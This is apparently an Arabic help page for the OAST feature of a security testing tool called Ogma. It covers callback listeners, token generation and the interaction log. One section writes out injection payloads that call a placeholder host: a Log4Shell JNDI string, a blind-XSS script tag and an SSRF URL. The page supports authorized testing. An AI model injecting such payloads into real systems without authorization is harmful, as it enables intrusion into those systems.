انتقل إلى المحتوى

OAST ​

يكشف OAST (اختبار أمان التطبيقات خارج القناة) الثغرات التي لا تنتج استجابة مرئية؛ إذ ينشئ الهدف بدلا من ذلك اتصالا صادرا إلى مستمع تتحكم فيه، مما يؤكد المشكلة.

آلية العمل ​

يشغل Ogma مستمعين محليين لعدة بروتوكولات. عندما يتصل التطبيق الهدف بأحد هؤلاء المستمعين، يسجل التفاعل مع عنوان IP المصدر والطابع الزمني والبيانات المستلمة والرمز الذي حقن.

بروتوكولات المستمعين ​

البروتوكولالمنفذ الافتراضيحالة الاستخدام
HTTPقابل للإعدادSSRF وXSS الأعمى وخطافات الويب
HTTPSقابل للإعدادSSRF عبر TLS
DNSقابل للإعدادالحقن الأعمى وXXE وlog4shell
SMTPقابل للإعدادحقن ترويسات البريد الإلكتروني وSSRF إلى خدمات البريد

أعد منافذ المستمعين واسم النطاق المستخدم في الرموز المولدة في لوحة إعدادات OAST.

توليد رمز اتصال راجع ​

  1. افتح الأدوات المساعدة > OAST.
  2. انقر توليد رمز. يكون كل رمز فريدا لكل اختبار.
  3. انسخ الرمز. يتضمن نطاق المستمع ومعرفا فريدا لربط التفاعلات بالاختبار المحدد الذي تسبب فيها.

مثال على صيغة الرمز: [unique-id].[your-oast-domain]

استخدام الرموز في الحمولات ​

احقن رمز الاتصال الراجع في أي حقل قد يدفع التطبيق إلى إنشاء اتصال صادر:

  • SSRF: استخدم رمز HTTP/HTTPS بوصفه عنوان URL الهدف: https://[token]/
  • XXE: أشر إلى الرمز في DOCTYPE أو في عنوان URL لكيان خارجي.
  • Log4Shell: ضعه في ترويسة: ${jndi:ldap://[token]/a}
  • XSS الأعمى: احقنه في خاصية src لعنصر script: <script src="https://[token]/x.js"></script>
  • حقن SMTP: استخدمه بوصفه عنوان وجهة أو عنوان URL في ترويسات البريد الإلكتروني.

سجل التفاعلات ​

تعرض لوحة التفاعلات كل اتصال راجع مستلم:

العمودالوصف
الوقتوقت استلام التفاعل
البروتوكولHTTP أو HTTPS أو DNS أو SMTP
عنوان IP المصدرعنوان IP الذي أنشأ الاتصال
الرمزالرمز الذي جرى الاتصال به
البياناتمسار الطلب أو اسم استعلام DNS أو بيانات SMTP

انقر أي صف لعرض تفاصيل التفاعل كاملة، بما فيها ترويسات الطلب ومتنه حيثما ينطبق ذلك.

ربط التفاعلات بالاختبارات ​

لأن كل رمز فريد، يمكنك حقن رموز مختلفة في معاملات أو طلبات مختلفة وتحديد نقطة الحقن التي تسببت في الاتصال الراجع بدقة.

برنامج مملوك. جميع الحقوق محفوظة.